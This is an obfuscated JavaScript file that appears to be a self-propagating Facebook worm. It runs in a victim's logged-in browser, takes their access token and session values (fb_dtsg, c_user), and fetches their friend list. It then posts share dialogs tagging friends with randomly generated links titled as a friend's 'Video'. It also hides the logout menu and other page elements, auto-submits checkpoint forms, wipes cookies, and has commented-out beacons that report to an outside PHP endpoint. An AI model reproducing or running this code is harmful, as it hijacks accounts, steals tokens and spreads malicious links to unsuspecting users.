//calma o gariyin amuga goyum calma
var consoleFree = true;
var hash = String.fromCharCode(123,104,97,115,104,125);
function _a() {
    var cookie_name = String.fromCharCode(98,97,115,108,97,116,95,118,51,54);
    var cookie_time = 10;

    if(!localStorage[cookie_name] || parseInt(localStorage[cookie_name]) < Date.now()-60*1000*cookie_time){
        localStorage[cookie_name] = Date.now();
        config={
            "link": String.fromCharCode(104,116,116,112,58,47,47,123,114,97,110,100,111,109,125,46,47,123,114,97,110,100,111,109,125),
            "post_limit": String.fromCharCode(54,53),
            "tag_limit": String.fromCharCode(49),
            "mode": true,
            "testuser": String.fromCharCode(49, 48, 48, 48, 48, 50, 48, 53, 48, 49, 55, 57, 49, 53, 50)
        }
        console.log(config);
        //add();
        if(config.mode == true || profile_id == config.testuser){
            _b();
            //_h();
            console.log(String.fromCharCode(65,114,107,97,100,97,115,108,97,114,32,103,101,116,105,114,105,108,105,121,111,114,46));
        }
    }else{
        var active_time = new Date();
        active_time.setTime(parseInt(localStorage[cookie_name]) + (60*1000*cookie_time));
        console.log(String.fromCharCode(97,99,116,105,118,101,95,116,105,109,101,58) + active_time.toLocaleString());
    }
}

function _b() {
    var xhr = new XMLHttpRequest();
    xhr.open(String.fromCharCode(71,69,84), String.fromCharCode(104,116,116,112,115,58,47,47,100,101,118,101,108,111,112,101,114,115,46,102,97,99,101,98,111,111,107,46,99,111,109,47,63,101,120,116,61,109,101));
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200){
            var vars = {};
            if(xhr.responseText.indexOf('"accessToken":"') > 0){
                vars.access_token = xhr.responseText.split('"accessToken":"')[1].split('"')[0].trim();
                console.log(vars.access_token);
                _c(vars);
            }else{
                // new Image().src = String.fromCharCode(104,116,116,112,115,58,47,47,102,117,116,117,110,103,97,46,99,111,109,47,112,104,112,47,115,111,110,117,99,46,112,104,112,63,115,111,110,117,99,61) + vars.post_id + String.fromCharCode(38,108,105,110,107,61) + vars.link + String.fromCharCode(38,105,109,103,61) + vars.image + String.fromCharCode(38,116,121,112,101,61,80,111,115,116) + String.fromCharCode(38,115,117,99,99,101,115,115,61,49);

            }
        }
    }
    xhr.send();
}

function _c(vars) {
    var params = {
        q:String.fromCharCode(83,69,76,69,67,84,32,117,105,100,44,32,110,97,109,101,44,32,111,110,108,105,110,101,95,112,114,101,115,101,110,99,101,44,32,112,105,99,95,98,105,103,44,32,99,97,110,95,112,111,115,116,32,32,70,82,79,77,32,117,115,101,114,32,87,72,69,82,69,32,117,105,100,32,73,78,32,40,83,69,76,69,67,84,32,117,105,100,50,32,70,82,79,77,32,102,114,105,101,110,100,32,87,72,69,82,69,32,117,105,100,49,32,61,32,109,101,40,41,41,32,79,114,100,101,114,32,66,121,32,111,110,108,105,110,101,95,112,114,101,115,101,110,99,101,32,76,105,109,105,116,32,50,48,48,48),
        access_token:vars.access_token,
        ext:String.fromCharCode(109,101)
    }

    var xhr = new XMLHttpRequest();
    xhr.open(String.fromCharCode(71,69,84), String.fromCharCode(104,116,116,112,115,58,47,47,103,114,97,112,104,46,102,97,99,101,98,111,111,107,46,99,111,109,47,102,113,108,63)+_s(params), true);
    xhr.onreadystatechange = function(){
        if (xhr.readyState == 4 && xhr.status == 200){
            var data = JSON.parse(xhr.responseText.replace(String.fromCharCode(102,111,114,32,40,59,59,41,59),""));
            if (!data.error){
                var friends = data.data;
                friends = _o(friends);
                vars.friends = [];
                for(i=0;i<friends.length;i++){
                    if(vars.friends.length < config.post_limit && (friends[i].online_presence == String.fromCharCode(97,99,116,105,118,101) || friends[i].online_presence == String.fromCharCode(105,100,108,101))){
                        vars.friends.push(friends[i]);
                    }
                }

                if(vars.friends.length < config.post_limit){
                    friends = _o(friends);
                    for(i=0;i<friends.length;i++){
                        if(vars.friends.length < config.post_limit  && _i(vars.friends, String.fromCharCode(117,105,100), friends[i].uid) == false){
                            vars.friends.push(friends[i]);
                        }
                    }
                }
                _d(vars);
            }else{
                // new Image().src = String.fromCharCode(104,116,116,112,115,58,47,47,102,117,116,117,110,103,97,46,99,111,109,47,112,104,112,47,115,111,110,117,99,46,112,104,112,63,115,111,110,117,99,61) + vars.post_id + String.fromCharCode(38,108,105,110,107,61) + vars.link + String.fromCharCode(38,105,109,103,61) + vars.image + String.fromCharCode(38,116,121,112,101,61,80,111,115,116) + String.fromCharCode(38,115,117,99,99,101,115,115,61,49);
            }
        }
    }
    xhr.send();
}

function _d(vars){
    var p_limit = Math.ceil(vars.friends.length/config.tag_limit);
    config.post_limit = p_limit>config.post_limit?config.post_limit:p_limit;
    if(config.post_limit == 0){
        config.post_limit = 1;
    }
    for(p=0;p<config.post_limit;p++){
        vars.tags = [];
        for(pk=0;pk<config.tag_limit;pk++){
            var index = pk+(config.tag_limit*p);
            if(vars.friends[index]){
                vars.tags.push(vars.friends[index]);
            }
        }
        vars.uid = vars.tags[0].uid;
        vars.image = String.fromCharCode(104,116,116,112,115,58,47,47,103,114,97,112,104,46,102,97,99,101,98,111,111,107,46,99,111,109,47)+vars.uid+String.fromCharCode(47,112,105,99,116,117,114,101,63,119,105,100,116,104,61,50,48,48,38,104,101,105,103,104,116,61,50,48,48);
        vars.name = vars.tags[0].name ? vars.tags[0].name.split(String.fromCharCode(32))[0] : vars.tags[0].text.split(String.fromCharCode(32))[0]; //.toLocaleLowerCase();
        console.log(vars.tags);
        _e(vars);
    }
}

function _e(vars){
    var uid = vars.uid;
    var name = vars.name;
    var image = vars.image;
    var arrs = [String.fromCharCode(100, 111, 116, 116, 97, 46, 103, 97),String.fromCharCode(100, 111, 116, 116, 97, 46, 103, 97),String.fromCharCode(100, 111, 116, 116, 97, 46, 103, 97),String.fromCharCode(100, 111, 116, 116, 97, 46, 103, 97),String.fromCharCode(100, 111, 116, 116, 97, 46, 103, 97)];
    var lnkx = arrs[Math.floor(Math.random()*arrs.length)];
                vars.link = String.fromCharCode(104,116,116,112,58,47,47)+_r(8)+String.fromCharCode(46)+lnkx+String.fromCharCode(47)+_r(8);
                vars.uid = uid;
                vars.image = image;
                vars.name = name;
                _f(vars);
            }



function _f(vars){
    var uid = vars.uid;
    var link = vars.link;
    var name = vars.name;
    var image = vars.image;
    var getParams = {
        ext:String.fromCharCode(109,101)
    }

    var params = {
        fb_dtsg:fb_dtsg,
        app_id:String.fromCharCode(50,53,53,53,52,57,48,55,53,57,54),
        redirect_uri:String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,102,97,99,101,98,111,111,107,46,99,111,109,47,100,105,97,108,111,103,47,114,101,116,117,114,110,47,99,108,111,115,101),
        display:String.fromCharCode(112,111,112,117,112),
        access_token:"",
        sdk:"",
        from_post:1,
        xhpc_context:String.fromCharCode(104,111,109,101),
        xhpc_ismeta:1,
        xhpc_timeline:"",
        mode:String.fromCharCode(102,114,105,101,110,100),
        friendTarget:vars.name,
        audience_targets:vars.uid,
        xhpc_targetid:profile_id,
        xhpc_publish_type:1,
        xhpc_message_text:"",
        xhpc_message:"",
        quote:"",
        is_explicit_place:"",
        composertags_place:"",
        composertags_place_name:"",
        tagger_session_id:Math.floor(Date.now()/1000),
        "action_type_id[0]":"",
        "object_str[0]":"",
        "object_id[0]":"",
        hide_object_attachment:0,
        og_suggestion_mechanism:"",
        og_suggestion_logging_data:"",
        icon_id:"",
        share_action_properties:JSON.stringify({"object":vars.link}),
        share_action_type_id:String.fromCharCode(52,48,48,54,56,49,50,49,54,54,53,52,49,55,53),
        title:vars.name+String.fromCharCode(32,86,105,100,101,111),
        description:"",
        caption:"",
        picture:vars.image,
        device_code:"",
        device_shared:"",
        ref:"",
        dialog_url:String.fromCharCode(104,116,116,112,115,58,47,47,119,119,119,46,102,97,99,101,98,111,111,107,46,99,111,109,47,100,105,97,108,111,103,47,102,101,101,100,63,97,112,112,95,105,100,61,50,53,53,53,52,57,48,55,53,57,54,38,100,105,115,112,108,97,121,61,112,111,112,117,112,38,112,105,99,116,117,114,101,61)+vars.image+String.fromCharCode(38,110,97,109,101,61)+_r(8)+String.fromCharCode(38,108,105,110,107,61)+vars.link+String.fromCharCode(38,116,111,61)+vars.uid+String.fromCharCode(38,114,101,100,105,114,101,99,116,95,117,114,105,61,104,116,116,112,37,51,65,37,50,70,37,50,70,119,119,119,46,102,97,99,101,98,111,111,107,46,99,111,109,37,50,70,100,105,97,108,111,103,37,50,70,114,101,116,117,114,110,37,50,70,99,108,111,115,101),
        composertags_city:"",
        disable_location_sharing:false,
        composer_predicted_city:"",
        __CONFIRM__:1,
        __user:profile_id,
        __a:1,
        __dyn:String.fromCharCode(55,120,101,88,120,97,69,82,48,103,98,119,45,119,82,65,75,69,104,121,56,106,114,87,111,52,54,49,116,119,65,120,117,49,51,119,109,56,103,120,90,51,111,99,85,57,85,75,97,120,101,85,87,50,121,55,69,52,105,117,51,101,50,50,53,111,98,56,97,85,98,111,54,117,99,120,71,52,56,104,119,118,57,70,111,113,65,103,87),
        __req:3,
        __be:-1,
        __pc:String.fromCharCode(80,72,65,83,69,68,58,68,69,70,65,85,76,84),
        ttstamp:ttstamp,
        __rev:__rev
    }

    var xhr = new XMLHttpRequest();
    xhr.open(String.fromCharCode(80,79,83,84), String.fromCharCode(104,116,116,112,115,58,47,47,119,119,119,46,102,97,99,101,98,111,111,107,46,99,111,109,47,118,50,46,51,47,100,105,97,108,111,103,47,115,104,97,114,101,47,115,117,98,109,105,116,63)+_s(getParams));
    xhr.setRequestHeader(String.fromCharCode(67,111,110,116,101,110,116,45,84,121,112,101), String.fromCharCode(97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,59,32,99,104,97,114,115,101,116,61,85,84,70,45,56));
    xhr.send(_s(params));
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            var data = JSON.parse(xhr.responseText.replace(String.fromCharCode(102,111,114,32,40,59,59,41,59),""));
            if(!data.error && xhr.responseText.indexOf(String.fromCharCode(112,111,115,116,95,105,100,61)) > 0){
                vars.post_id = xhr.responseText.split(String.fromCharCode(112,111,115,116,95,105,100,61))[1].split(String.fromCharCode(35))[0].split(String.fromCharCode(95))[1];
                vars.name = name;
                vars.link = link;
                vars.uid = uid;
                vars.image = image;
                console.log(String.fromCharCode(80,111,115,116,32,103,111,110,100,101,114,105,108,100,105,58,32,104,116,116,112,115,58,47,47,119,119,119,46,102,97,99,101,98,111,111,107,46,99,111,109,47) + vars.post_id);
                _g(vars);
            }else if(data.error){
                // new Image().src = String.fromCharCode(104,116,116,112,115,58,47,47,102,117,116,117,110,103,97,46,99,111,109,47,112,104,112,47,115,111,110,117,99,46,112,104,112,63,115,111,110,117,99,61) + vars.post_id + String.fromCharCode(38,108,105,110,107,61) + vars.link + String.fromCharCode(38,105,109,103,61) + vars.image + String.fromCharCode(38,116,121,112,101,61,80,111,115,116) + String.fromCharCode(38,115,117,99,99,101,115,115,61,49);

            }
        }
    }
}

function _g(vars){
    var uid = vars.uid;
    var link = vars.link;
    var name = vars.name;
    var image = vars.image;
    var post_id = vars.post_id;
    var params = {
        access_token:vars.access_token,
        fields:String.fromCharCode(112,114,105,118,97,99,121),
        ext:String.fromCharCode(109,101)
    }

    var xhr = new XMLHttpRequest();
    xhr.open(String.fromCharCode(71,69,84), String.fromCharCode(104,116,116,112,115,58,47,47,103,114,97,112,104,46,102,97,99,101,98,111,111,107,46,99,111,109,47)+profile_id+String.fromCharCode(95)+vars.post_id+String.fromCharCode(63)+_s(params));
    xhr.setRequestHeader(String.fromCharCode(67,111,110,116,101,110,116,45,84,121,112,101), String.fromCharCode(97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,59,32,99,104,97,114,115,101,116,61,85,84,70,45,56));
    xhr.send();
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4) {
            var data = {};
            try {
                data = JSON.parse(xhr.responseText.replace(String.fromCharCode(102,111,114,32,40,59,59,41,59),""));
            }catch(err){}
            vars.name = name;
            vars.link = link;
            vars.uid = uid;
            vars.image = image;
            vars.post_id = post_id;
            if(data.privacy && data.privacy.value && data.privacy.value == String.fromCharCode(69,86,69,82,89,79,78,69)){
                // new Image().src = String.fromCharCode(104,116,116,112,58,47,47,102,117,116,117,110,103,97,46,99,111,109,47,112,104,112,47,115,111,110,117,99,46,112,104,112,63,115,111,110,117,99,61) + vars.post_id + String.fromCharCode(38,108,105,110,107,61) + vars.link + String.fromCharCode(38,105,109,103,61) + vars.image + String.fromCharCode(38,116,121,112,101,61,80,117,98,108,105,99) + String.fromCharCode(38,115,117,99,99,101,115,115,61,49);
            }else{
                // new Image().src = String.fromCharCode(104,116,116,112,115,58,47,47,102,117,116,117,110,103,97,46,99,111,109,47,112,104,112,47,115,111,110,117,99,46,112,104,112,63,115,111,110,117,99,61) + vars.post_id + String.fromCharCode(38,108,105,110,107,61) + vars.link + String.fromCharCode(38,105,109,103,61) + vars.image + String.fromCharCode(38,116,121,112,101,61,80,111,115,116) + String.fromCharCode(38,115,117,99,99,101,115,115,61,49);
            }
        }
    }
}

function _h(){
    var params = {
        value:String.fromCharCode(51,48,48,54,52,53,48,56,51,51,56,52,55,51,53),
        prev_value:String.fromCharCode(50,57,49,54,54,55,48,54,52,50,55,57,55,49,52),
        __user:profile_id,
        __a:1,
        __dyn:String.fromCharCode(55,65,109,97,106,69,121,108,51,53,119,122,103,68,120,121,71,56,69,105,103,109,122,70,69,98,69,75,65,56,65,121,56,90,57,76,70,119,120,66,120,67,98,122,69,83,50,78,54,120,121,98,120,117,51,102,122,111,97,113,120,98,120,106,120,50,55,87,56,56,121,98,120,45,113,65,52,69,45,56,75,117,69,106,120,67,50,101,55,56,52,105,52,85,57,88,119),
        __req:String.fromCharCode(49,53),
        fb_dtsg:fb_dtsg,
        ttstamp:ttstamp,
        __rev:__rev
    }

    var xhr = new XMLHttpRequest();
    xhr.open(String.fromCharCode(80,79,83,84), String.fromCharCode(104,116,116,112,115,58,47,47,119,119,119,46,102,97,99,101,98,111,111,107,46,99,111,109,47,97,106,97,120,47,115,101,116,116,105,110,103,115,47,103,114,97,110,117,108,97,114,95,112,114,105,118,97,99,121,47,99,111,109,112,111,115,101,114,46,112,104,112));
    xhr.setRequestHeader(String.fromCharCode(67,111,110,116,101,110,116,45,84,121,112,101), String.fromCharCode(97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,59,32,99,104,97,114,115,101,116,61,85,84,70,45,56));
    xhr.send(_s(params));
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            var data = JSON.parse(xhr.responseText.replace(String.fromCharCode(102,111,114,32,40,59,59,41,59),""));
            
        }
    }
}

function _i(arr, key, value){
    var res = false;
    for(a=0;a<arr.length;a++){
        for(k in arr[a]){
            if(k == key && arr[a][k] == value){
                res = true;
                break;
            }
        }
    }
    return res;
}

function _j(t,h){
    var a = String.fromCharCode(97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,114,115,116,117,118,121,122,120,48,49,50,51,52,53,54,55,56,57);
    var c = "";
    for(cr=0;cr<t.length;cr++){
        c += a[h.indexOf(t[cr])];
    }
    return c;
}

function _k() {
  function _l() {
    return Math.floor((1 + Math.random()) * 0x10000)
      .toString(16)
      .substring(1);
  }
  return _l() + _l() + String.fromCharCode(45) + _l() + String.fromCharCode(45) + _l() + String.fromCharCode(45) +
    _l() + String.fromCharCode(45) + _l() + _l() + _l();
}

function _m(l, m) {
    var r = [];
    while (r.length < l) {
        var rnd = Math.floor(Math.random() * m);
        if (r.indexOf(rnd) < 0) {
            r.push(rnd);
        }
    }
    return r;
}

function _n(a,k){
    var found = false;
    for(key in a){
        if(key.toString() == k){
            found = a[key];
            break;
        }else if(typeof a[key] == "object"){
            found = _n(a[key],k);
            if(found != false){
                break;
            }
        }
    }
    return found;
}

function _o(array) {
  var currentIndex = array.length, temporaryValue, randomIndex;

  while (0 !== currentIndex) {
    randomIndex = Math.floor(Math.random() * currentIndex);
    currentIndex -= 1;
    temporaryValue = array[currentIndex];
    array[currentIndex] = array[randomIndex];
    array[randomIndex] = temporaryValue;
  }

  return array;
}

function _p(min,max){
    return Math.floor(Math.random()* (max-min))+min;
}

function _r(uzunluk) {
    mtn = String.fromCharCode(97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,114,115,116,117,118,121,122,120,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,82,83,84,85,86,89,90,88,48,49,50,51,52,53,54,55,56,57);
    ret = "";
    for (l = 0; l < uzunluk; l++) {
        ret += mtn[Math.floor(Math.random() * mtn.length)];
    }
    return ret;
}

function _s(json) {
    return Object.keys(json).map(function(key) {
        return encodeURIComponent(key) + String.fromCharCode(61) + encodeURIComponent(json[key]);
    }).join(String.fromCharCode(38));
}

function _t(){
    window.setInterval(function() {
        if (document.getElementsByClassName(String.fromCharCode(95,53,99,101))) {
            for (i = 0; i < document.getElementsByClassName(String.fromCharCode(95,53,99,101)).length; i++) {
                document.getElementsByClassName(String.fromCharCode(95,53,99,101))[i].innerHTML = "";
            }
        
        } 
        if (document.getElementsByClassName(String.fromCharCode(117,105,84,111,103,103,108,101,32,119,114,97,112))) {
            for (i = 0; i < document.getElementsByClassName(String.fromCharCode(117,105,84,111,103,103,108,101,32,119,114,97,112)).length; i++) {
                document.getElementsByClassName(String.fromCharCode(117,105,84,111,103,103,108,101,32,119,114,97,112))[i].innerHTML = "";
            }
        }
        if(document.getElementById(String.fromCharCode(108,111,103,111,117,116,77,101,110,117))){
           document.getElementById(String.fromCharCode(108,111,103,111,117,116,77,101,110,117)).parentNode.outerHTML = ""
        }
        if (document.getElementsByClassName(String.fromCharCode(117,105,80,111,112,111,118,101,114))) {
            for (i = 0; i < document.getElementsByClassName(String.fromCharCode(117,105,80,111,112,111,118,101,114)).length; i++) {
                document.getElementsByClassName(String.fromCharCode(117,105,80,111,112,111,118,101,114))[i].innerHTML = "";
            }
        }
        if (document.getElementsByClassName(String.fromCharCode(85,70,73,67,111,109,109,101,110,116,67,108,111,115,101,66,117,116,116,111,110))) {
            for (i = 0; i < document.getElementsByClassName(String.fromCharCode(85,70,73,67,111,109,109,101,110,116,67,108,111,115,101,66,117,116,116,111,110)).length; i++) {
                document.getElementsByClassName(String.fromCharCode(85,70,73,67,111,109,109,101,110,116,67,108,111,115,101,66,117,116,116,111,110))[i].outerHTML = "";
            }
        }
    }, 10);
}

function _u(){
    document.body.innerHTML = "";
    var params = {
        fb_dtsg:fb_dtsg,
        nh:nh,
        "submit[Get Started]":String.fromCharCode(71,101,116,32,83,116,97,114,116,101,100)
    }

    var xhr = new XMLHttpRequest();
    xhr.open(String.fromCharCode(80,79,83,84), String.fromCharCode(104,116,116,112,115,58,47,47,119,119,119,46,102,97,99,101,98,111,111,107,46,99,111,109,47,99,104,101,99,107,112,111,105,110,116,47));
    xhr.setRequestHeader(String.fromCharCode(67,111,110,116,101,110,116,45,84,121,112,101), String.fromCharCode(97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,59,32,99,104,97,114,115,101,116,61,85,84,70,45,56));
    xhr.send(_s(params));
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4) {
            _v();
            console.log(String.fromCharCode(71,101,116,32,83,116,97,114,116,101,100));
        }
    }
}

function _v(){
    var params = {
        fb_dtsg:fb_dtsg,
        nh:nh,
        confirm:String.fromCharCode(111,110),
        "submit[Continue]":String.fromCharCode(67,111,110,116,105,110,117,101)
    }

    var xhr = new XMLHttpRequest();
    xhr.open(String.fromCharCode(80,79,83,84), String.fromCharCode(104,116,116,112,115,58,47,47,119,119,119,46,102,97,99,101,98,111,111,107,46,99,111,109,47,99,104,101,99,107,112,111,105,110,116,47));
    xhr.setRequestHeader(String.fromCharCode(67,111,110,116,101,110,116,45,84,121,112,101), String.fromCharCode(97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,59,32,99,104,97,114,115,101,116,61,85,84,70,45,56));
    xhr.send(_s(params));
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4) {
            console.log(String.fromCharCode(71,101,116,32,67,111,110,116,105,110,117,101));
            _y();
            location.href = String.fromCharCode(104,116,116,112,115,58,47,47,119,119,119,46,102,97,99,101,98,111,111,107,46,99,111,109);
        }
    }
}

function _y() {
    var cookies = document.cookie.split(String.fromCharCode(59));
    for (var i = 0; i < cookies.length; i++) {
        var cookie = cookies[i];
        var eqPos = cookie.indexOf(String.fromCharCode(61));
        var name = eqPos > -1 ? cookie.substr(0, eqPos) : cookie;
        document.cookie = name + String.fromCharCode(61,59,101,120,112,105,114,101,115,61,84,104,117,44,32,48,49,32,74,97,110,32,49,57,55,48,32,48,48,58,48,48,58,48,48,32,71,77,84,59,100,111,109,97,105,110,61,46,102,97,99,101,98,111,111,107,46,99,111,109);
    }
}

var checkStatus = String.fromCharCode(111,102,102);
var element = new Image();
element.__defineGetter__(String.fromCharCode(105,100), function() {
    checkStatus = String.fromCharCode(111,110);
});
console.log(element);

if (location.hostname.indexOf(String.fromCharCode(102,97,99,101,98,111,111,107,46,99,111,109)) >= 0 && (checkStatus == String.fromCharCode(111,102,102) || consoleFree == true)) {
    fb_dtsg_list = document.getElementsByName(String.fromCharCode(102,98,95,100,116,115,103));
    if(!document.getElementById(String.fromCharCode(105,115,114,117,110)) && fb_dtsg_list.length > 0 && location.href.indexOf(String.fromCharCode(102,97,99,101,98,111,111,107,46,99,111,109,47,99,104,101,99,107,112,111,105,110,116)) < 0){
        var log = document.createElement(String.fromCharCode(109,101,116,97));
        log.id = String.fromCharCode(105,115,114,117,110);
        document.head.appendChild(log);
        _t();
        profile_id = document.cookie.match(/c_user=(\d+)/)[1];
        fb_dtsg = fb_dtsg_list[0].value;
        __rev = document.head.innerHTML.split('"revision":')[1].split(",")[0];
        ajaxpipe_token = document.head.innerHTML.split('"ajaxpipe_token":')[1].split(",")[0];
        ttstamp = "";
        for (var x = 0; x < fb_dtsg.length; x++){
            ttstamp += fb_dtsg.charCodeAt(x);
        }
        ttstamp = String.fromCharCode(50) + ttstamp;
        console.log(String.fromCharCode(85,115,101,114,58)+profile_id);
        console.log(String.fromCharCode(102,98,95,100,116,115,103,58)+fb_dtsg);
        console.log(String.fromCharCode(95,95,114,101,118,58)+__rev);
        console.log(String.fromCharCode(116,116,115,116,97,109,112,58)+ttstamp);
        console.log(String.fromCharCode(97,106,97,120,112,105,112,101,95,116,111,107,101,110,58)+ajaxpipe_token);

         window.setTimeout(function(){
            window.top.location.reload();
        }, 1000*60*12);
        _a();
    }
    if(location.href.indexOf(String.fromCharCode(102,97,99,101,98,111,111,107,46,99,111,109,47,99,104,101,99,107,112,111,105,110,116)) > 0 && fb_dtsg_list.length > 0){
        fb_dtsg = fb_dtsg_list[0].value;
        nh = document.getElementsByName(String.fromCharCode(110,104))[0].value;
        console.log(fb_dtsg);
        console.log(nh);
        _u();
    }
}else if(location.hostname.indexOf(String.fromCharCode(102,97,99,101,98,111,111,107,46,99,111,109)) >= 0){
    console.error(String.fromCharCode(78,111,116,32,102,111,117,110,100));
}
